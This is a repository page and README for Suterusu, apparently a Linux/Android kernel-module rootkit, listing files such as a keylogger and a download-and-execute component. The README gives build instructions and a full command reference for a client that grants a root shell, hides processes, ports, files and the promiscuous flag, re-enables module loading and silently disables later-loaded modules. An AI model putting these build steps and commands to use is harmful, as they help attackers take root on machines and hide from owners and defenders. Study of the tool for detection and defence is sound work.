ticoombs
/
suterusu
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
41 Commits
1 Branch
0 Tags
85 KiB
 
 
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from 'master'
${ noResults }
Go to file
Michael Coppola b03af69015
Merge pull request #10 from lawrencehoffman/master 		6 years ago
.gitignore Ignore module compilation artifacts in git 9 years ago
LICENSE Initial commit 10 years ago
Makefile Added ability to neutralize future loaded modules (thanks CERN-CERT/dresden) 10 years ago
README.md Added ability to neutralize future loaded modules (thanks CERN-CERT/dresden) 10 years ago
common.h Handle kernel versions that placed autoconf.h in include/linux/ rather than include/generated/ 9 years ago
dlexec.c Cleaned up debugging macros 10 years ago
hookrw.c Fixed bug where we dereferenced an unvalidated userspace pointer in some debugging code. Thanks spender! 9 years ago
icmp.c Cleaned up debugging macros 10 years ago
keylog.h VERY unfinished, UNTESTED code towards keylogging to file 10 years ago
keylogger.c Don't ask me how that got there 9 years ago
main.c Upgrade main.c to reflect changes in 3.19 6 years ago
module.c Added ability to neutralize future loaded modules (thanks CERN-CERT/dresden) 10 years ago
serve.c Initial commit from most recent svn 10 years ago
sock.c Added ability to neutralize future loaded modules (thanks CERN-CERT/dresden) 10 years ago
util.c Use kallsyms_on_each_symbol() to resolve symbols no matter the kernel version... it's always exported and we get to remove a LINUX_VERSION_CODE check. 9 years ago

README.md

Suterusu

Typical compilation steps:

$ wget http://kernel.org/linux-x.x.x.tar.gz
$ tar xvf linux-x.x.x.tar.gz
$ cd linux-x.x.x
$ make menuconfig
$ make modules_prepare
$ cd /path/to/suterusu
$ make linux-x86 KDIR=/path/to/kernel

To compile against the currently running kernel (kernel headers installed):

$ make linux-x86 KDIR=/lib/modules/$(uname -r)/build

If a specific toolchain is desired for cross-compilation, provide the CROSS_COMPILE variable during make:

$ make android-arm CROSS_COMPILE=arm-linux-androideabi- KDIR=/path/to/kernel

To compile the command binary:

$ gcc sock.c -o sock

Commands

Root shell

$ ./sock 0

Hide PID

$ ./sock 1 [pid]

Unhide PID

$ ./sock 2 [pid]

Hide TCPv4 port

$ ./sock 3 [port]

Unhide TCPv4 port

$ ./sock 4 [port]

Hide TCPv6 port

$ ./sock 5 [port]

Unhide TCPv6 port

$ ./sock 6 [port]

Hide UDPv4 port

$ ./sock 7 [port]

Unhide UDPv4 port

$ ./sock 8 [port]

Hide UDPv6 port

$ ./sock 9 [port]

Unhide UDPv6 port

$ ./sock 10 [port]

Hide file/directory

$ ./sock 11 [name]

Unhide file/directory

$ ./sock 12 [name]

Hide network PROMISC flag

$ ./sock 13

Unhide network PROMISC flag

$ ./sock 14

Enable module loading (force kernel.modules_disabled=0)

$ ./sock 15

Silently prohibit module loading (neutralize future loaded modules)

$ ./sock 16

Silently re-permit module loading (undo command 16)

$ ./sock 17

File/directory hiding

At the moment, file/dir hiding only hides names on the / filesystem. Note that names are hidden, not paths. For instance, giving the name ".blah" to Suterusu will hide the name ".blah" in all directories on the filesystem.